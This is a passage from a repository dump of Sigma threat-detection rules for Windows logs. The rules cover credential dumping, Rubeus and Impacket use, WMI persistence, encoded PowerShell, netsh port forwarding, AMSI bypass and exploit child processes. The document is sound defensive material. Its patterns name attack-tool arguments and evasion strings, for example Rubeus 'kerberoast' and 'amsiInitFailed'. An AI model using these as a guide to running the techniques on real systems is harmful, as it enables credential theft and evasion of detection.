14 | service: sysmon
15 | detection:
16 | selection:
17 | EventID: 3
18 | Initiated: 'true'
19 | DestinationHostname:
20 | - '*.github.com'
21 | - '*.githubusercontent.com'
22 | Image: 'C:\Windows\\*'
23 | condition: selection
24 | falsepositives:
25 | - 'Unknown'
26 | - '@subTee in your network'
27 | level: high
28 |
29 |
--------------------------------------------------------------------------------
/elemental/media/sigma_rules/sysmon_win_binary_susp_com.yml:
--------------------------------------------------------------------------------
1 | title: Microsoft Binary Suspicious Communication Endpoint
2 | id: e0f8ab85-0ac9-423b-a73a-81b3c7b1aa97
3 | status: experimental
4 | description: Detects an executable in the Windows folder accessing suspicious domains
5 | references:
6 | - https://twitter.com/M_haggis/status/900741347035889665
7 | - https://twitter.com/M_haggis/status/1032799638213066752
8 | author: Florian Roth
9 | date: 2018/08/30
10 | tags:
11 | - attack.lateral_movement
12 | - attack.t1105
13 | logsource:
14 | product: windows
15 | service: sysmon
16 | detection:
17 | selection:
18 | EventID: 3
19 | Initiated: 'true'
20 | DestinationHostname:
21 | - '*dl.dropboxusercontent.com'
22 | - '*.pastebin.com'
23 | - '*.githubusercontent.com' # includes both gists and github repositories
24 | Image: 'C:\Windows\\*'
25 | condition: selection
26 | falsepositives:
27 | - 'Unknown'
28 | level: high
29 |
30 |
--------------------------------------------------------------------------------
/elemental/media/sigma_rules/sysmon_wmi_event_subscription.yml:
--------------------------------------------------------------------------------
1 | title: WMI Event Subscription
2 | id: 0f06a3a5-6a09-413f-8743-e6cf35561297
3 | status: experimental
4 | description: Detects creation of WMI event subscription persistence method
5 | references:
6 | - https://attack.mitre.org/techniques/T1084/
7 | tags:
8 | - attack.t1084
9 | - attack.persistence
10 | author: Tom Ueltschi (@c_APT_ure)
11 | date: 2019/01/12
12 | logsource:
13 | product: windows
14 | service: sysmon
15 | detection:
16 | selector:
17 | EventID:
18 | - 19
19 | - 20
20 | - 21
21 | condition: selector
22 | falsepositives:
23 | - exclude legitimate (vetted) use of WMI event subscription in your network
24 | level: high
25 |
--------------------------------------------------------------------------------
/elemental/media/sigma_rules/sysmon_wmi_persistence_commandline_event_consumer.yml:
--------------------------------------------------------------------------------
1 | title: WMI Persistence - Command Line Event Consumer
2 | id: 05936ce2-ee05-4dae-9d03-9a391cf2d2c6
3 | status: experimental
4 | description: Detects WMI command line event consumers
5 | references:
6 | - https://www.eideon.com/2018-03-02-THL03-WMIBackdoors/
7 | author: Thomas Patzke
8 | date: 2018/03/07
9 | tags:
10 | - attack.t1084
11 | - attack.persistence
12 | logsource:
13 | product: windows
14 | service: sysmon
15 | detection:
16 | selection:
17 | EventID: 7
18 | Image: 'C:\Windows\System32\wbem\WmiPrvSE.exe'
19 | ImageLoaded: 'wbemcons.dll'
20 | condition: selection
21 | falsepositives:
22 | - Unknown (data set is too small; further testing needed)
23 | level: high
24 |
--------------------------------------------------------------------------------
/elemental/media/sigma_rules/sysmon_wmi_persistence_script_event_consumer_write.yml:
--------------------------------------------------------------------------------
1 | title: WMI Persistence - Script Event Consumer File Write
2 | id: 33f41cdd-35ac-4ba8-814b-c6a4244a1ad4
3 | status: experimental
4 | description: Detects file writes of WMI script event consumer
5 | references:
6 | - https://www.eideon.com/2018-03-02-THL03-WMIBackdoors/
7 | author: Thomas Patzke
8 | date: 2018/03/07
9 | tags:
10 | - attack.t1084
11 | - attack.persistence
12 | logsource:
13 | product: windows
14 | service: sysmon
15 | detection:
16 | selection:
17 | EventID: 11
18 | Image: 'C:\WINDOWS\system32\wbem\scrcons.exe'
19 | condition: selection
20 | falsepositives:
21 | - Unknown (data set is too small; further testing needed)
22 | level: high
23 |
--------------------------------------------------------------------------------
/elemental/media/sigma_rules/web_cve_2018_2894_weblogic_exploit.yml:
--------------------------------------------------------------------------------
1 | title: Oracle WebLogic Exploit
2 | id: 37e8369b-43bb-4bf8-83b6-6dd43bda2000
3 | description: Detects access to a webshell droped into a keytore folder on the WebLogic server
4 | author: Florian Roth
5 | date: 2018/07/22
6 | status: experimental
7 | references:
8 | - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-2894
9 | - https://twitter.com/pyn3rd/status/1020620932967223296
10 | - https://github.com/LandGrey/CVE-2018-2894
11 | logsource:
12 | category: webserver
13 | detection:
14 | selection:
15 | c-uri-path:
16 | - '*/config/keystore/*.js*'
17 | condition: selection
18 | fields:
19 | - c-ip
20 | - c-dns
21 | falsepositives:
22 | - Unknown
23 | tags:
24 | - attack.t1100
25 | - attack.t1190
26 | - attack.initial_access
27 | - attack.persistence
28 | - attack.privilege_escalation
29 | - cve.2018-2894
30 | level: critical
31 |
32 |
--------------------------------------------------------------------------------
/elemental/media/sigma_rules/win_admin_rdp_login.yml:
--------------------------------------------------------------------------------
1 | title: Admin User Remote Logon
2 | id: 0f63e1ef-1eb9-4226-9d54-8927ca08520a
3 | description: Detect remote login by Administrator user depending on internal pattern
4 | references:
5 | - https://car.mitre.org/wiki/CAR-2016-04-005
6 | tags:
7 | - attack.lateral_movement
8 | - attack.t1078
9 | - car.2016-04-005
10 | status: experimental
11 | author: juju4
12 | logsource:
13 | product: windows
14 | service: security
15 | definition: 'Requirements: Identifiable administrators usernames (pattern or special unique character. ex: "Admin-*"), internal policy mandating use only as secondary account'
16 | detection:
17 | selection:
18 | EventID: 4624
19 | LogonType: 10
20 | AuthenticationPackageName: Negotiate
21 | AccountName: 'Admin-*'
22 | condition: selection
23 | falsepositives:
24 | - Legitimate administrative activity
25 | level: low
26 |
--------------------------------------------------------------------------------
/elemental/media/sigma_rules/win_admin_share_access.yml:
--------------------------------------------------------------------------------
1 | title: Access to ADMIN$ Share
2 | id: 098d7118-55bc-4912-a836-dc6483a8d150
3 | description: Detects access to $ADMIN share
4 | tags:
5 | - attack.lateral_movement
6 | - attack.t1077
7 | status: experimental
8 | author: Florian Roth
9 | logsource:
10 | product: windows
11 | service: security
12 | definition: 'The advanced audit policy setting "Object Access > Audit File Share" must be configured for Success/Failure'
13 | detection:
14 | selection:
15 | EventID: 5140
16 | ShareName: Admin$
17 | filter:
18 | SubjectUserName: '*$'
19 | condition: selection and not filter
20 | falsepositives:
21 | - Legitimate administrative activity
22 | level: low
23 |
--------------------------------------------------------------------------------
/elemental/media/sigma_rules/win_alert_lsass_access.yml:
--------------------------------------------------------------------------------
1 | title: LSASS Access Detected via Attack Surface Reduction
2 | id: a0a278fe-2c0e-4de2-ac3c-c68b08a9ba98
3 | description: Detects Access to LSASS Process
4 | status: experimental
5 | references:
6 | - https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-exploit-guard/attack-surface-reduction-exploit-guard?WT.mc_id=twitter
7 | author: Markus Neis
8 | date: 2018/08/26
9 | tags:
10 | - attack.credential_access
11 | - attack.t1003
12 | # Defender Attack Surface Reduction
13 | logsource:
14 | product: windows_defender
15 | definition: 'Requirements:Enabled Block credential stealing from the Windows local security authority subsystem (lsass.exe) from Attack Surface Reduction (GUID: 9e6c4e1f-7d60-472f-ba1a-a39ef669e4b2)'
16 | detection:
17 | selection:
18 | EventID: 1121
19 | Path: '*\lsass.exe'
20 | condition: selection
21 | falsepositives:
22 | - Google Chrome GoogleUpdate.exe
23 | - Some Taskmgr.exe related activity
24 | level: high
25 |
--------------------------------------------------------------------------------
/elemental/media/sigma_rules/win_apt_bluemashroom.yml:
--------------------------------------------------------------------------------
1 | title: BlueMashroom DLL Load
2 | id: bd70d3f8-e60e-4d25-89f0-0b5a9cff20e0
3 | status: experimental
4 | description: Detects a suspicious DLL loading from AppData Local path as described in BlueMashroom report
5 | references:
6 | - https://www.virusbulletin.com/conference/vb2019/abstracts/apt-cases-exploiting-vulnerabilities-region-specific-software
7 | tags:
8 | - attack.defense_evasion
9 | - attack.t1117
10 | author: Florian Roth
11 | date: 2019/10/02
12 | logsource:
13 | category: process_creation
14 | product: windows
15 | detection:
16 | selection:
17 | CommandLine:
18 | - '*\regsvr32*\AppData\Local\\*'
19 | - '*\AppData\Local\\*,DllEntry*'
20 | condition: selection
21 | falsepositives:
22 | - Unlikely
23 | level: critical
24 |
--------------------------------------------------------------------------------
/elemental/media/sigma_rules/win_atsvc_task.yml:
--------------------------------------------------------------------------------
1 | title: Remote Task Creation via ATSVC named pipe
2 | id: f6de6525-4509-495a-8a82-1f8b0ed73a00
3 | description: Detects remote task creation via at.exe or API interacting with ATSVC namedpipe
4 | author: Samir Bousseaden
5 | references:
6 | - https://blog.menasec.net/2019/03/threat-hunting-25-scheduled-tasks-for.html
7 | tags:
8 | - attack.lateral_movement
9 | - attack.persistence
10 | - attack.t1053
11 | - car.2013-05-004
12 | - car.2015-04-001
13 | logsource:
14 | product: windows
15 | service: security
16 | description: 'The advanced audit policy setting "Object Access > Audit Detailed File Share" must be configured for Success/Failure'
17 | detection:
18 | selection:
19 | EventID: 5145
20 | ShareName: \\*\IPC$
21 | RelativeTargetName: atsvc
22 | Accesses: '*WriteData*'
23 | condition: selection
24 | falsepositives:
25 | - pentesting
26 | level: medium
27 |
--------------------------------------------------------------------------------
/elemental/media/sigma_rules/win_cmdkey_recon.yml:
--------------------------------------------------------------------------------
1 | title: Cmdkey Cached Credentials Recon
2 | id: 07f8bdc2-c9b3-472a-9817-5a670b872f53
3 | status: experimental
4 | description: Detects usage of cmdkey to look for cached credentials
5 | references:
6 | - https://www.peew.pw/blog/2017/11/26/exploring-cmdkey-an-edge-case-for-privilege-escalation
7 | - https://technet.microsoft.com/en-us/library/cc754243(v=ws.11).aspx
8 | author: jmallette
9 | tags:
10 | - attack.credential_access
11 | - attack.t1003
12 | logsource:
13 | category: process_creation
14 | product: windows
15 | detection:
16 | selection:
17 | Image: '*\cmdkey.exe'
18 | CommandLine: '* /list *'
19 | condition: selection
20 | fields:
21 | - CommandLine
22 | - ParentCommandLine
23 | - User
24 | falsepositives:
25 | - Legitimate administrative tasks.
26 | level: low
27 |
--------------------------------------------------------------------------------
/elemental/media/sigma_rules/win_control_panel_item.yml:
--------------------------------------------------------------------------------
1 | title: Control Panel Items
2 | id: 0ba863e6-def5-4e50-9cea-4dd8c7dc46a4
3 | status: experimental
4 | description: Detects the use of a control panel item (.cpl) outside of the System32 folder
5 | reference:
6 | - https://attack.mitre.org/techniques/T1196/
7 | tags:
8 | - attack.execution
9 | - attack.t1196
10 | - attack.defense_evasion
11 | author: Kyaw Min Thein
12 | date: 2019/08/27
13 | level: critical
14 | logsource:
15 | product: windows
16 | category: process_creation
17 | detection:
18 | selection:
19 | CommandLine: '*.cpl'
20 | filter:
21 | CommandLine:
22 | - '*\System32\\*'
23 | - '*%System%*'
24 | condition: selection and not filter
25 | falsepositives:
26 | - Unknown
27 |
--------------------------------------------------------------------------------
/elemental/media/sigma_rules/win_encoded_frombase64string.yml:
--------------------------------------------------------------------------------
1 | title: Encoded FromBase64String
2 | id: fdb62a13-9a81-4e5c-a38f-ea93a16f6d7c
3 | status: experimental
4 | description: Detects a base64 encoded FromBase64String keyword in a process command line
5 | author: Florian Roth
6 | date: 2019/08/24
7 | tags:
8 | - attack.t1086
9 | - attack.t1140
10 | - attack.execution
11 | - attack.defense_evasion
12 | logsource:
13 | category: process_creation
14 | product: windows
15 | detection:
16 | selection:
17 | CommandLine|base64offset|contains: '::FromBase64String'
18 | condition: selection
19 | fields:
20 | - CommandLine
21 | - ParentCommandLine
22 | falsepositives:
23 | - unknown
24 | level: critical
25 |
--------------------------------------------------------------------------------
/elemental/media/sigma_rules/win_encoded_iex.yml:
--------------------------------------------------------------------------------
1 | title: Encoded IEX
2 | id: 88f680b8-070e-402c-ae11-d2914f2257f1
3 | status: experimental
4 | description: Detects a base64 encoded IEX command string in a process command line
5 | author: Florian Roth
6 | date: 2019/08/23
7 | tags:
8 | - attack.t1086
9 | - attack.t1140
10 | - attack.execution
11 | logsource:
12 | category: process_creation
13 | product: windows
14 | detection:
15 | selection:
16 | CommandLine|base64offset|contains:
17 | - 'IEX (['
18 | - 'iex (['
19 | - 'iex (New'
20 | - 'IEX (New'
21 | condition: selection
22 | fields:
23 | - CommandLine
24 | - ParentCommandLine
25 | falsepositives:
26 | - unknown
27 | level: critical
28 |
--------------------------------------------------------------------------------
/elemental/media/sigma_rules/win_exploit_cve_2015_1641.yml:
--------------------------------------------------------------------------------
1 | title: Exploit for CVE-2015-1641
2 | id: 7993792c-5ce2-4475-a3db-a3a5539827ef
3 | status: experimental
4 | description: Detects Winword starting uncommon sub process MicroScMgmt.exe as used in exploits for CVE-2015-1641
5 | references:
6 | - https://www.virustotal.com/en/file/5567408950b744c4e846ba8ae726883cb15268a539f3bb21758a466e47021ae8/analysis/
7 | - https://www.hybrid-analysis.com/sample/5567408950b744c4e846ba8ae726883cb15268a539f3bb21758a466e47021ae8?environmentId=100
8 | author: Florian Roth
9 | date: 2018/02/22
10 | tags:
11 | - attack.defense_evasion
12 | - attack.t1036
13 | logsource:
14 | category: process_creation
15 | product: windows
16 | detection:
17 | selection:
18 | ParentImage: '*\WINWORD.EXE'
19 | Image: '*\MicroScMgmt.exe '
20 | condition: selection
21 | falsepositives:
22 | - Unknown
23 | level: critical
24 |
--------------------------------------------------------------------------------
/elemental/media/sigma_rules/win_exploit_cve_2017_0261.yml:
--------------------------------------------------------------------------------
1 | title: Exploit for CVE-2017-0261
2 | id: 864403a1-36c9-40a2-a982-4c9a45f7d833
3 | status: experimental
4 | description: Detects Winword starting uncommon sub process FLTLDR.exe as used in exploits for CVE-2017-0261 and CVE-2017-0262
5 | references:
6 | - https://www.fireeye.com/blog/threat-research/2017/05/eps-processing-zero-days.html
7 | author: Florian Roth
8 | date: 2018/02/22
9 | tags:
10 | - attack.defense_evasion
11 | - attack.privilege_escalation
12 | - attack.t1055
13 | logsource:
14 | category: process_creation
15 | product: windows
16 | detection:
17 | selection:
18 | ParentImage: '*\WINWORD.EXE'
19 | Image: '*\FLTLDR.exe*'
20 | condition: selection
21 | falsepositives:
22 | - Several false positives identified, check for suspicious file names or locations (e.g. Temp folders)
23 | level: medium
24 |
--------------------------------------------------------------------------------
/elemental/media/sigma_rules/win_exploit_cve_2017_11882.yml:
--------------------------------------------------------------------------------
1 | title: Droppers exploiting CVE-2017-11882
2 | id: 678eb5f4-8597-4be6-8be7-905e4234b53a
3 | status: experimental
4 | description: Detects exploits that use CVE-2017-11882 to start EQNEDT32.EXE and other sub processes like mshta.exe
5 | references:
6 | - https://www.hybrid-analysis.com/sample/2a4ae284c76f868fc51d3bb65da8caa6efacb707f265b25c30f34250b76b7507?environmentId=100
7 | - https://www.google.com/url?hl=en&q=https://embedi.com/blog/skeleton-closet-ms-office-vulnerability-you-didnt-know-about&source=gmail&ust=1511481120837000&usg=AFQjCNGdL7gVwLXaNSl2Td8ylDYbSJFmPw
8 | author: Florian Roth
9 | date: 2017/11/23
10 | tags:
11 | - attack.defense_evasion
12 | - attack.t1211
13 | logsource:
14 | category: process_creation
15 | product: windows
16 | detection:
17 | selection:
18 | ParentImage: '*\EQNEDT32.EXE'
19 | condition: selection
20 | fields:
21 | - CommandLine
22 | falsepositives:
23 | - unknown
24 | level: critical
25 |
--------------------------------------------------------------------------------
/elemental/media/sigma_rules/win_exploit_cve_2017_8759.yml:
--------------------------------------------------------------------------------
1 | title: Exploit for CVE-2017-8759
2 | id: fdd84c68-a1f6-47c9-9477-920584f94905
3 | description: Detects Winword starting uncommon sub process csc.exe as used in exploits for CVE-2017-8759
4 | references:
5 | - https://www.hybrid-analysis.com/sample/0b4ef455e385b750d9f90749f1467eaf00e46e8d6c2885c260e1b78211a51684?environmentId=100
6 | - https://www.reverse.it/sample/0b4ef455e385b750d9f90749f1467eaf00e46e8d6c2885c260e1b78211a51684?environmentId=100
7 | tags:
8 | - attack.execution
9 | - attack.t1203
10 | author: Florian Roth
11 | date: 2017/09/15
12 | logsource:
13 | category: process_creation
14 | product: windows
15 | detection:
16 | selection:
17 | ParentImage: '*\WINWORD.EXE'
18 | Image: '*\csc.exe'
19 | condition: selection
20 | falsepositives:
21 | - Unknown
22 | level: critical
23 |
--------------------------------------------------------------------------------
/elemental/media/sigma_rules/win_hack_rubeus.yml:
--------------------------------------------------------------------------------
1 | title: Rubeus Hack Tool
2 | id: 7ec2c172-dceb-4c10-92c9-87c1881b7e18
3 | description: Detects command line parameters used by Rubeus hack tool
4 | author: Florian Roth
5 | references:
6 | - https://www.harmj0y.net/blog/redteaming/from-kekeo-to-rubeus/
7 | date: 2018/12/19
8 | tags:
9 | - attack.credential_access
10 | - attack.t1003
11 | - attack.s0005
12 | logsource:
13 | category: process_creation
14 | product: windows
15 | detection:
16 | selection:
17 | CommandLine:
18 | - '* asreproast *'
19 | - '* dump /service:krbtgt *'
20 | - '* kerberoast *'
21 | - '* createnetonly /program:*'
22 | - '* ptt /ticket:*'
23 | - '* /impersonateuser:*'
24 | - '* renew /ticket:*'
25 | - '* asktgt /user:*'
26 | - '* harvest /interval:*'
27 | condition: selection
28 | falsepositives:
29 | - unlikely
30 | level: critical
31 |
--------------------------------------------------------------------------------
/elemental/media/sigma_rules/win_hack_smbexec.yml:
--------------------------------------------------------------------------------
1 | title: smbexec.py Service Installation
2 | id: 52a85084-6989-40c3-8f32-091e12e13f09
3 | description: Detects the use of smbexec.py tool by detecting a specific service installation
4 | author: Omer Faruk Celik
5 | date: 2018/03/20
6 | references:
7 | - https://blog.ropnop.com/using-credentials-to-own-windows-boxes-part-2-psexec-and-services/
8 | tags:
9 | - attack.lateral_movement
10 | - attack.execution
11 | - attack.t1077
12 | - attack.t1035
13 | logsource:
14 | product: windows
15 | service: system
16 | detection:
17 | service_installation:
18 | EventID: 7045
19 | ServiceName: 'BTOBTO'
20 | ServiceFileName: '*\execute.bat'
21 | condition: service_installation
22 | fields:
23 | - ServiceName
24 | - ServiceFileName
25 | falsepositives:
26 | - Penetration Test
27 | - Unknown
28 | level: critical
--------------------------------------------------------------------------------
/elemental/media/sigma_rules/win_impacket_secretdump.yml:
--------------------------------------------------------------------------------
1 | title: Possible Impacket SecretDump remote activity
2 | id: 252902e3-5830-4cf6-bf21-c22083dfd5cf
3 | description: Detect AD credential dumping using impacket secretdump HKTL
4 | author: Samir Bousseaden
5 | references:
6 | - https://blog.menasec.net/2019/02/threat-huting-10-impacketsecretdump.html
7 | tags:
8 | - attack.credential_access
9 | - attack.t1003
10 | logsource:
11 | product: windows
12 | service: security
13 | description: 'The advanced audit policy setting "Object Access > Audit Detailed File Share" must be configured for Success/Failure'
14 | detection:
15 | selection:
16 | EventID: 5145
17 | ShareName: \\*\ADMIN$
18 | RelativeTargetName: 'SYSTEM32\\*.tmp'
19 | condition: selection
20 | falsepositives:
21 | - pentesting
22 | level: high
23 |
--------------------------------------------------------------------------------
/elemental/media/sigma_rules/win_lethalhta.yml:
--------------------------------------------------------------------------------
1 | title: MSHTA spwaned by SVCHOST as seen in LethalHTA
2 | id: ed5d72a6-f8f4-479d-ba79-02f6a80d7471
3 | status: experimental
4 | description: Detects MSHTA.EXE spwaned by SVCHOST described in report
5 | references:
6 | - https://codewhitesec.blogspot.com/2018/07/lethalhta.html
7 | tags:
8 | - attack.defense_evasion
9 | - attack.execution
10 | - attack.t1170
11 | author: Markus Neis
12 | date: 2018/06/07
13 | logsource:
14 | category: process_creation
15 | product: windows
16 | detection:
17 | selection:
18 | ParentImage: '*\svchost.exe'
19 | Image: '*\mshta.exe'
20 | condition: selection
21 | falsepositives:
22 | - Unknown
23 | level: high
24 |
--------------------------------------------------------------------------------
/elemental/media/sigma_rules/win_mal_creddumper.yml:
--------------------------------------------------------------------------------
1 | action: global
2 | title: Malicious Service Install
3 | id: 4976aa50-8f41-45c6-8b15-ab3fc10e79ed
4 | description: This method detects well-known keywords of malicious services in the Windows System Eventlog
5 | author: Florian Roth
6 | tags:
7 | - attack.credential_access
8 | - attack.t1003
9 | - attack.s0005
10 | logsource:
11 | product: windows
12 | service: system
13 | detection:
14 | selection1:
15 | EventID:
16 | - 7045
17 | keywords:
18 | Message:
19 | - '*WCE SERVICE*'
20 | - '*WCESERVICE*'
21 | - '*DumpSvc*'
22 | quarkspwdump:
23 | EventID: 16
24 | HiveName: '*\AppData\Local\Temp\SAM*.dmp'
25 | condition: ( selection1 and keywords ) or ( selection2 and keywords ) or quarkspwdump
26 | falsepositives:
27 | - Unlikely
28 | level: high
29 | ---
30 | logsource:
31 | product: windows
32 | service: security
33 | detection:
34 | selection2:
35 | EventID: 4697
36 |
--------------------------------------------------------------------------------
/elemental/media/sigma_rules/win_mal_ursnif.yml:
--------------------------------------------------------------------------------
1 | title: Ursnif
2 | id: 21f17060-b282-4249-ade0-589ea3591558
3 | status: experimental
4 | description: Detects new registry key created by Ursnif malware.
5 | references:
6 | - https://blog.yoroi.company/research/ursnif-long-live-the-steganography/
7 | - https://blog.trendmicro.com/trendlabs-security-intelligence/phishing-campaign-uses-hijacked-emails-to-deliver-ursnif-by-replying-to-ongoing-threads/
8 | tags:
9 | - attack.execution
10 | - attack.t1112
11 | author: megan201296
12 | date: 2019/02/13
13 | logsource:
14 | product: windows
15 | service: sysmon
16 | detection:
17 | selection:
18 | EventID: 13
19 | TargetObject: '*\Software\AppDataLow\Software\Microsoft\\*'
20 | condition: selection
21 | falsepositives:
22 | - Unknown
23 | level: critical
24 |
--------------------------------------------------------------------------------
/elemental/media/sigma_rules/win_mal_wceaux_dll.yml:
--------------------------------------------------------------------------------
1 | title: WCE wceaux.dll Access
2 | id: 1de68c67-af5c-4097-9c85-fe5578e09e67
3 | status: experimental
4 | description: Detects wceaux.dll access while WCE pass-the-hash remote command execution on source host
5 | author: Thomas Patzke
6 | references:
7 | - https://www.jpcert.or.jp/english/pub/sr/ir_research.html
8 | - https://jpcertcc.github.io/ToolAnalysisResultSheet
9 | tags:
10 | - attack.credential_access
11 | - attack.t1003
12 | - attack.s0005
13 | logsource:
14 | product: windows
15 | service: security
16 | detection:
17 | selection:
18 | EventID:
19 | - 4656
20 | - 4658
21 | - 4660
22 | - 4663
23 | ObjectName: '*\wceaux.dll'
24 | condition: selection
25 | falsepositives:
26 | - Penetration testing
27 | level: critical
28 |
--------------------------------------------------------------------------------
/elemental/media/sigma_rules/win_malware_dridex.yml:
--------------------------------------------------------------------------------
1 | title: Dridex Process Pattern
2 | id: e6eb5a96-9e6f-4a18-9cdd-642cfda21c8e
3 | status: experimental
4 | description: Detects typical Dridex process patterns
5 | references:
6 | - https://app.any.run/tasks/993daa5e-112a-4ff6-8b5a-edbcec7c7ba3
7 | author: Florian Roth
8 | date: 2019/01/10
9 | tags:
10 | - attack.defense_evasion
11 | - attack.privilege_escalation
12 | - attack.t1055
13 | logsource:
14 | category: process_creation
15 | product: windows
16 | detection:
17 | selection1:
18 | CommandLine: '*\svchost.exe C:\Users\\*\Desktop\\*'
19 | selection2:
20 | ParentImage: '*\svchost.exe*'
21 | CommandLine:
22 | - '*whoami.exe /all'
23 | - '*net.exe view'
24 | condition: 1 of them
25 | falsepositives:
26 | - Unlikely
27 | level: critical
28 |
--------------------------------------------------------------------------------
/elemental/media/sigma_rules/win_mavinject_proc_inj.yml:
--------------------------------------------------------------------------------
1 | title: MavInject Process Injection
2 | id: 17eb8e57-9983-420d-ad8a-2c4976c22eb8
3 | status: experimental
4 | description: Detects process injection using the signed Windows tool Mavinject32.exe
5 | references:
6 | - https://twitter.com/gN3mes1s/status/941315826107510784
7 | - https://reaqta.com/2017/12/mavinject-microsoft-injector/
8 | - https://twitter.com/Hexacorn/status/776122138063409152
9 | author: Florian Roth
10 | date: 2018/12/12
11 | tags:
12 | - attack.t1055
13 | - attack.t1218
14 | logsource:
15 | category: process_creation
16 | product: windows
17 | detection:
18 | selection:
19 | CommandLine: '* /INJECTRUNNING *'
20 | condition: selection
21 | falsepositives:
22 | - unknown
23 | level: critical
24 |
--------------------------------------------------------------------------------
/elemental/media/sigma_rules/win_mmc_spawn_shell.yml:
--------------------------------------------------------------------------------
1 | title: MMC Spawning Windows Shell
2 | id: 05a2ab7e-ce11-4b63-86db-ab32e763e11d
3 | status: experimental
4 | description: Detects a Windows command line executable started from MMC.
5 | author: Karneades, Swisscom CSIRT
6 | tags:
7 | - attack.lateral_movement
8 | - attack.t1175
9 | logsource:
10 | category: process_creation
11 | product: windows
12 | detection:
13 | selection:
14 | ParentImage: '*\mmc.exe'
15 | Image:
16 | - '*\cmd.exe'
17 | - '*\powershell.exe'
18 | - '*\wscript.exe'
19 | - '*\cscript.exe'
20 | - '*\sh.exe'
21 | - '*\bash.exe'
22 | - '*\reg.exe'
23 | - '*\regsvr32.exe'
24 | - '*\BITSADMIN*'
25 | condition: selection
26 | fields:
27 | - CommandLine
28 | - Image
29 | - ParentCommandLine
30 | level: high
31 |
--------------------------------------------------------------------------------
/elemental/media/sigma_rules/win_netsh_fw_add.yml:
--------------------------------------------------------------------------------
1 | title: Netsh
2 | id: cd5cfd80-aa5f-44c0-9c20-108c4ae12e3c
3 | description: Allow Incoming Connections by Port or Application on Windows Firewall
4 | references:
5 | - https://attack.mitre.org/software/S0246/ (Lazarus HARDRAIN)
6 | - https://www.operationblockbuster.com/wp-content/uploads/2016/02/Operation-Blockbuster-RAT-and-Staging-Report.pdf
7 | date: 2019/01/29
8 | tags:
9 | - attack.lateral_movement
10 | - attack.command_and_control
11 | - attack.t1090
12 | status: experimental
13 | author: Markus Neis
14 | logsource:
15 | category: process_creation
16 | product: windows
17 | detection:
18 | selection:
19 | CommandLine:
20 | - '*netsh firewall add*'
21 | condition: selection
22 | falsepositives:
23 | - Legitimate administration
24 | level: medium
25 |
--------------------------------------------------------------------------------
/elemental/media/sigma_rules/win_netsh_packet_capture.yml:
--------------------------------------------------------------------------------
1 | title: Capture a Network Trace with netsh.exe
2 | id: d3c3861d-c504-4c77-ba55-224ba82d0118
3 | status: experimental
4 | description: Detects capture a network trace via netsh.exe trace functionality
5 | references:
6 | - https://blogs.msdn.microsoft.com/canberrapfe/2012/03/30/capture-a-network-trace-without-installing-anything-capture-a-network-trace-of-a-reboot/
7 | author: Kutepov Anton, oscd.community
8 | date: 2019/10/24
9 | tags:
10 | - attack.discovery
11 | - attack.t1040
12 | logsource:
13 | category: process_creation
14 | product: windows
15 | detection:
16 | selection:
17 | CommandLine|contains|all:
18 | - netsh
19 | - trace
20 | - start
21 | condition: selection
22 | falsepositives:
23 | - Legitimate administrator or user uses netsh.exe trace functionality for legitimate reason
24 | level: medium
25 |
--------------------------------------------------------------------------------
/elemental/media/sigma_rules/win_netsh_port_fwd.yml:
--------------------------------------------------------------------------------
1 | title: Netsh Port Forwarding
2 | id: 322ed9ec-fcab-4f67-9a34-e7c6aef43614
3 | description: Detects netsh commands that configure a port forwarding
4 | references:
5 | - https://www.fireeye.com/blog/threat-research/2019/01/bypassing-network-restrictions-through-rdp-tunneling.html
6 | date: 2019/01/29
7 | tags:
8 | - attack.lateral_movement
9 | - attack.command_and_control
10 | - attack.t1090
11 | status: experimental
12 | author: Florian Roth
13 | logsource:
14 | category: process_creation
15 | product: windows
16 | detection:
17 | selection:
18 | CommandLine:
19 | - netsh interface portproxy add v4tov4 *
20 | condition: selection
21 | falsepositives:
22 | - Legitimate administration
23 | level: medium
24 |
--------------------------------------------------------------------------------
/elemental/media/sigma_rules/win_netsh_port_fwd_3389.yml:
--------------------------------------------------------------------------------
1 | title: Netsh RDP Port Forwarding
2 | id: 782d6f3e-4c5d-4b8c-92a3-1d05fed72e63
3 | description: Detects netsh commands that configure a port forwarding of port 3389 used for RDP
4 | references:
5 | - https://www.fireeye.com/blog/threat-research/2019/01/bypassing-network-restrictions-through-rdp-tunneling.html
6 | date: 2019/01/29
7 | tags:
8 | - attack.lateral_movement
9 | - attack.t1021
10 | - car.2013-07-002
11 | status: experimental
12 | author: Florian Roth
13 | logsource:
14 | category: process_creation
15 | product: windows
16 | detection:
17 | selection:
18 | CommandLine:
19 | - netsh i* p*=3389 c*
20 | condition: selection
21 | falsepositives:
22 | - Legitimate administration
23 | level: high
24 |
--------------------------------------------------------------------------------
/elemental/media/sigma_rules/win_overpass_the_hash.yml:
--------------------------------------------------------------------------------
1 | title: Successful Overpass the Hash Attempt
2 | id: 192a0330-c20b-4356-90b6-7b7049ae0b87
3 | status: experimental
4 | description: Detects successful logon with logon type 9 (NewCredentials) which matches the Overpass the Hash behavior of e.g Mimikatz's sekurlsa::pth module.
5 | references:
6 | - https://cyberwardog.blogspot.de/2017/04/chronicles-of-threat-hunter-hunting-for.html
7 | author: Roberto Rodriguez (source), Dominik Schaudel (rule)
8 | date: 2018/02/12
9 | tags:
10 | - attack.lateral_movement
11 | - attack.t1075
12 | - attack.s0002
13 | logsource:
14 | product: windows
15 | service: security
16 | detection:
17 | selection:
18 | EventID: 4624
19 | LogonType: 9
20 | LogonProcessName: seclogo
21 | AuthenticationPackageName: Negotiate
22 | condition: selection
23 | falsepositives:
24 | - Runas command-line tool using /netonly parameter
25 | level: high
26 |
--------------------------------------------------------------------------------
/elemental/media/sigma_rules/win_powershell_amsi_bypass.yml:
--------------------------------------------------------------------------------
1 | title: Powershell AMSI Bypass via .NET Reflection
2 | id: 30edb182-aa75-42c0-b0a9-e998bb29067c
3 | status: experimental
4 | description: Detects Request to amsiInitFailed that can be used to disable AMSI Scanning
5 | references:
6 | - https://twitter.com/mattifestation/status/735261176745988096
7 | - https://www.hybrid-analysis.com/sample/0ced17419e01663a0cd836c9c2eb925e3031ffb5b18ccf35f4dea5d586d0203e?environmentId=120
8 | tags:
9 | - attack.execution
10 | - attack.defense_evasion
11 | - attack.t1086
12 | author: Markus Neis
13 | date: 2018/08/17
14 | logsource:
15 | category: process_creation
16 | product: windows
17 | detection:
18 | selection1:
19 | CommandLine:
20 | - '*System.Management.Automation.AmsiUtils*'
21 | selection2:
22 | CommandLine:
23 | - '*amsiInitFailed*'
